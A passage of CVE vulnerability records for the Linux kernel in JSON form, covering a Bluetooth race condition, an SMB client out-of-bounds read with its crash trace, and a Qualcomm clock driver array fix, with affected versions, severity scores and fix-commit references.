"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:04.406Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/06dd21045a7e8bc8701b0ebedcd9a30a6325878b"
},
{
"url": "https://git.kernel.org/stable/c/0e939a002c8a7d66e60bd0ea6b281fb39d713c1a"
},
{
"url": "https://git.kernel.org/stable/c/2a2ff709511617de9c6c072eeee82bcbbdfecaf8"
},
{
"url": "https://git.kernel.org/stable/c/589ec16174dd9378953b8232ae76fad0a96e1563"
},
{
"url": "https://git.kernel.org/stable/c/c0691de7df1d51482a52cac93b7fe82fd9dd296b"
},
{
"url": "https://git.kernel.org/stable/c/0307cf443308ecc6be9b2ca312bb31bae5e5a7ad"
},
{
"url": "https://git.kernel.org/stable/c/4469c0c5b14a0919f5965c7ceac96b523eb57b79"
}
],
"title": "net: phy: fix phy_get_internal_delay accessing an empty array",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27047",
"datePublished": "2024-05-01T12:54:25.156Z",
"dateReserved": "2024-02-19T14:20:24.213Z",
"dateUpdated": "2025-05-04T09:03:04.406Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-24858 (GCVE-0-2024-24858)
Vulnerability from cvelistv5
Published
2024-02-05 07:30
Modified
2025-02-13 17:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Summary
A race condition was found in the Linux kernel's net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux kernel |
Version: v4.0-rc1 < v6.8-rc2 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-24858",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-06T18:47:37.158239Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:10.209Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:28:13.187Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8154"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"bluetooth"
],
"packageName": "kernel",
"platforms": [
"Linux",
"x86",
"ARM"
],
"product": "Linux kernel",
"programFiles": [
"https://gitee.com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/hci_debugfs.c"
],
"repo": "https://gitee.com/anolis/cloud-kernel.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "v6.8-rc2",
"status": "affected",
"version": "v4.0-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u767d\u5bb6\u9a79 \u003cbaijiaju@buaa.edu.cn\u003e"
},
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u97e9\u6842\u680b \u003changuidong@buaa.edu.cn\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA race condition was found in the Linux kernel\u0027s net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service.\u003c/p\u003e"
}
],
"value": "A race condition was found in the Linux kernel\u0027s net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service."
}
],
"impacts": [
{
"capecId": "CAPEC-26",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-26 Leveraging Race Conditions"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:10:52.036Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8154"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://lore.kernel.org/lkml/20231222161317.6255-1-2045gemini@gmail.com/\"\u003ehttps://lore.kernel.org/lkml/20231222161317.6255-1-2045gemini@gmail.com/\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "https://lore.kernel.org/lkml/20231222161317.6255-1-2045gemini@gmail.com/ https://lore.kernel.org/lkml/20231222161317.6255-1-2045gemini@gmail.com/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Race condition vulnerability in Linux kernel net/bluetooth in {conn,adv}_{min,max}_interval_set()",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2024-24858",
"datePublished": "2024-02-05T07:30:55.483Z",
"dateReserved": "2024-02-01T09:11:56.214Z",
"dateUpdated": "2025-02-13T17:40:33.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52434 (GCVE-0-2023-52434)
Vulnerability from cvelistv5
Published
2024-02-20 18:04
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix potential OOBs in smb2_parse_contexts()
Validate offsets and lengths before dereferencing create contexts in
smb2_parse_contexts().
This fixes following oops when accessing invalid create contexts from
server:
BUG: unable to handle page fault for address: ffff8881178d8cc3
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 4a01067 P4D 4a01067 PUD 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014
RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs]
Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00
00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 <0f> b7
7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00
RSP: 0018:ffffc900007939e0 EFLAGS: 00010216
RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90
RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000
RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000
R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000
R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22
FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0
PKRU: 55555554
Call Trace:
<TASK>
? __die+0x23/0x70
? page_fault_oops+0x181/0x480
? search_module_extables+0x19/0x60
? srso_alias_return_thunk+0x5/0xfbef5
? exc_page_fault+0x1b6/0x1c0
? asm_exc_page_fault+0x26/0x30
? smb2_parse_contexts+0xa0/0x3a0 [cifs]
SMB2_open+0x38d/0x5f0 [cifs]
? smb2_is_path_accessible+0x138/0x260 [cifs]
smb2_is_path_accessible+0x138/0x260 [cifs]
cifs_is_path_remote+0x8d/0x230 [cifs]
cifs_mount+0x7e/0x350 [cifs]
cifs_smb3_do_mount+0x128/0x780 [cifs]
smb3_get_tree+0xd9/0x290 [cifs]
vfs_get_tree+0x2c/0x100
? capable+0x37/0x70
path_mount+0x2d7/0xb80
? srso_alias_return_thunk+0x5/0xfbef5
? _raw_spin_unlock_irqrestore+0x44/0x60
__x64_sys_mount+0x11a/0x150
do_syscall_64+0x47/0xf0
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7f8737657b1e
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52434",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-20T19:31:41.798943Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:08.159Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-01-17T20:02:50.854Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250117-0009/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/client/cached_dir.c",
"fs/smb/client/smb2pdu.c",
"fs/smb/client/smb2proto.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6726429c18c62dbf5e96ebbd522f262e016553fb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "13fb0fc4917621f3dfa285a27eaf7151d770b5e5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "890bc4fac3c0973a49cac35f634579bebba7fe48",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1ae3c59355dc9882e09c020afe8ffbd895ad0f29",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "17a0f64cc02d4972e21c733d9f21d1c512963afa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "af1689a9b7701d9907dfc84d2a4b57c4bc907144",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/client/cached_dir.c",
"fs/smb/client/smb2pdu.c",
"fs/smb/client/smb2proto.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.277",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.7",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.277",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential OOBs in smb2_parse_contexts()\n\nValidate offsets and lengths before dereferencing create contexts in\nsmb2_parse_contexts().\n\nThis fixes following oops when accessing invalid create contexts from\nserver:\n\n BUG: unable to handle page fault for address: ffff8881178d8cc3\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 4a01067 P4D 4a01067 PUD 0\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\n RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs]\n Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00\n 00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 \u003c0f\u003e b7\n 7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00\n RSP: 0018:ffffc900007939e0 EFLAGS: 00010216\n RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90\n RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000\n RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000\n R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000\n R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22\n FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000)\n knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ? __die+0x23/0x70\n ? page_fault_oops+0x181/0x480\n ? search_module_extables+0x19/0x60\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? exc_page_fault+0x1b6/0x1c0\n ? asm_exc_page_fault+0x26/0x30\n ? smb2_parse_contexts+0xa0/0x3a0 [cifs]\n SMB2_open+0x38d/0x5f0 [cifs]\n ? smb2_is_path_accessible+0x138/0x260 [cifs]\n smb2_is_path_accessible+0x138/0x260 [cifs]\n cifs_is_path_remote+0x8d/0x230 [cifs]\n cifs_mount+0x7e/0x350 [cifs]\n cifs_smb3_do_mount+0x128/0x780 [cifs]\n smb3_get_tree+0xd9/0x290 [cifs]\n vfs_get_tree+0x2c/0x100\n ? capable+0x37/0x70\n path_mount+0x2d7/0xb80\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? _raw_spin_unlock_irqrestore+0x44/0x60\n __x64_sys_mount+0x11a/0x150\n do_syscall_64+0x47/0xf0\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\n RIP: 0033:0x7f8737657b1e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:24.317Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb"
},
{
"url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5"
},
{
"url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48"
},
{
"url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29"
},
{
"url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa"
},
{
"url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144"
}
],
"title": "smb: client: fix potential OOBs in smb2_parse_contexts()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52434",
"datePublished": "2024-02-20T18:04:44.006Z",
"dateReserved": "2024-02-20T12:30:33.290Z",
"dateUpdated": "2025-05-04T07:36:24.317Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26965 (GCVE-0-2024-26965)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: mmcc-msm8974: fix terminating of frequency table arrays
The frequency table arrays are supposed to be terminated with an
empty element. Add such entry to the end of the arrays where it
is missing in order to avoid possible out-of-bound access when
the table is traversed by functions like qcom_find_freq() or
qcom_find_freq_floor().
Only compile tested.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 Version: d8b212014e69d6b6323773ce6898f224ef4ed0d6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26965",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:50:48.637005Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:04.278Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.666Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99740c4791dc8019b0d758c5389ca6d1c0604d95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/86bf75d9158f511db7530bc82a84b19a5134d089"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f562f3b25177c2055b20fd8cf000496f6fa9194"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/537040c257ab4cd0673fbae048f3940c8ea2e589"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e9926fef71e514b4a8ea9d11d5a84d52b181362"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae99e199037c580b7350bfa3596f447a53bcf01f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca2cf98d46748373e830a13d85d215d64a2d9bf2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/mmcc-msm8974.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "99740c4791dc8019b0d758c5389ca6d1c0604d95",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "86bf75d9158f511db7530bc82a84b19a5134d089",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "8f562f3b25177c2055b20fd8cf000496f6fa9194",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "537040c257ab4cd0673fbae048f3940c8ea2e589",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "7e9926fef71e514b4a8ea9d11d5a84d52b181362",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "ae99e199037c580b7350bfa3596f447a53bcf01f",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "ca2cf98d46748373e830a13d85d215d64a2d9bf2",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
},
{
"lessThan": "e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96",
"status": "affected",
"version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/mmcc-msm8974.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.14"
},
{
"lessThan": "3.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: mmcc-msm8974: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:58.832Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/99740c4791dc8019b0d758c5389ca6d1c0604d95"
},
{
"url": "https://git.kernel.org/stable/c/86bf75d9158f511db7530bc82a84b19a5134d089"
},
{
"url": "https://git.kernel.org/stable/c/3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060"
},
{
"url": "https://git.kernel.org/stable/c/8f562f3b25177c2055b20fd8cf000496f6fa9194"
},
{
"url": "https://git.kernel.org/stable/c/537040c257ab4cd0673fbae048f3940c8ea2e589"
},
{
"url": "https://git.kernel.org/stable/c/7e9926fef71e514b4a8ea9d11d5a84d52b181362"
},
{
